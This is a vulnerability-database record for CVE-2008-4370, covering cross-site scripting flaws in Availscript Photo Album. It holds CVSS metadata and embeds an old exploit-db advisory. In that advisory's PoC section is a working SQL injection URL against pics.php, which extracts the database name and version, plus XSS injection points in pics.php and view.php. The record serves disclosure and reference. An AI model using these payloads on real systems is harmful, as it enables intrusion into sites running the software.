ID CVE-2008-4370Type cveReporter cve@mitre.orgModified 2017-09-29T01:32:00
Description
Multiple cross-site scripting (XSS) vulnerabilities in Availscript Photo Album allow remote attackers to inject arbitrary web script or HTML via the (1) sid parameter to pics.php and the (2) a parameter to view.php.
{"id": "CVE-2008-4370", "bulletinFamily": "NVD", "title": "CVE-2008-4370", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Availscript Photo Album allow remote attackers to inject arbitrary web script or HTML via the (1) sid parameter to pics.php and the (2) a parameter to view.php.", "published": "2008-10-01T15:38:00", "modified": "2017-09-29T01:32:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4370", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/6411", "http://securityreason.com/securityalert/4330", "http://www.securityfocus.com/bid/31085", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45018"], "cvelist": ["CVE-2008-4370"], "type": "cve", "lastseen": "2021-02-02T05:35:17", "edition": 4, "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:6411"]}], "modified": "2021-02-02T05:35:17", "rev": 2}, "score": {"value": 4.4, "vector": "NONE", "modified": "2021-02-02T05:35:17", "rev": 2}, "vulnersScore": 4.4}, "cpe": ["cpe:/a:availscript:availscript_photo_album:*"], "affectedSoftware": [{"cpeName": "availscript:availscript_photo_album", "name": "availscript availscript photo album", "operator": "eq", "version": "*"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cpe23": ["cpe:2.3:a:availscript:availscript_photo_album:*:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:availscript:availscript_photo_album:*:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "31085", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/31085"}, {"name": "availscript-Photoalbum-pics-xss(45018)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/45018"}, {"name": "4330", "refsource": "SREASON", "tags": [], "url": "http://securityreason.com/securityalert/4330"}, {"name": "6411", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/6411"}]}
{"exploitdb": [{"lastseen": "2016-01-31T23:49:20", "description": "Availscript Photo Album (pics.php) Multiple Vulnerabilities. CVE-2008-4369,CVE-2008-4370. Webapps exploit for php platform", "published": "2008-09-09T00:00:00", "type": "exploitdb", "title": "Availscript Photo Album pics.php Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4370", "CVE-2008-4369"], "modified": "2008-09-09T00:00:00", "id": "EDB-ID:6411", "href": "https://www.exploit-db.com/exploits/6411/", "sourceData": "###########################################################\n# \n# ___ __ __ __ __ \n# /\\_ \\ /\\ \\\\ \\ /\\ \\/\\ \\ \n# ____\\//\\ \\ \\ \\ \\\\ \\ __ _ __ _\\ \\ \\ \\ \\ ____ \n# /',__\\ \\ \\ \\ \\ \\ \\\\ \\_ /\\ \\/'\\\\ \\/'\\\\ \\ \\ \\ \\/\\_ ,`\\ \n# /\\__, `\\ \\_\\ \\_\\ \\__ ,__\\\\> <\\\\> <\\\\ \\ \\_\\ \\/_/ /_ \n# \\/\\____/ /\\____\\\\/_/\\_\\_//\\_/\\_\\\\_/\\_\\ \\ \\_____\\/\\____\\\n# \\/___/ \\/____/ \\/_/ \\//\\/_///\\/_/ \\/_____/\\/____/\n# \n# security breakd0wn!\n###########################################################\n# \n# Title: Availscript Photo Album (pics.php) Multiple Vulnerabilities\n# Vendor: http://www.availscript.com/\n# Vulnerable Version: N/A\n# Fix: N/A\n# \n###########################################################\n# \n# c0ntact: sl4x.xuz[at]gmail[dot]com\n# d0rk: \"muahaha\"\n# stop lammo\n# \n###########################################################\n\n######################\n 1. Information\n######################\n With this script you can add pictures in categories create album or wallpaper website.\n\n######################\n 2. Vulnerabilities\n######################\n SQL Injection in \"pics.php\" in the \"sid\" parameter.\n Cross Site Scripting in \"pics.php\" in the \"sid\" parameter.\n Cross Site Scripting in \"view.php\" in the \"a\" parameter.\n\n######################\n 3. PoC\n######################\n http://localhost/path/pics.php?sid=-1+union+select+database(),2,3,4,5,6,7,8,version(),10,11,12--\n http://localhost/path/pics.php?sid=[XSS]\n http://localhost/path/view.php?a=[XSS]\n\n###########################################################\n\n# milw0rm.com [2008-09-09]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6411/"}]}
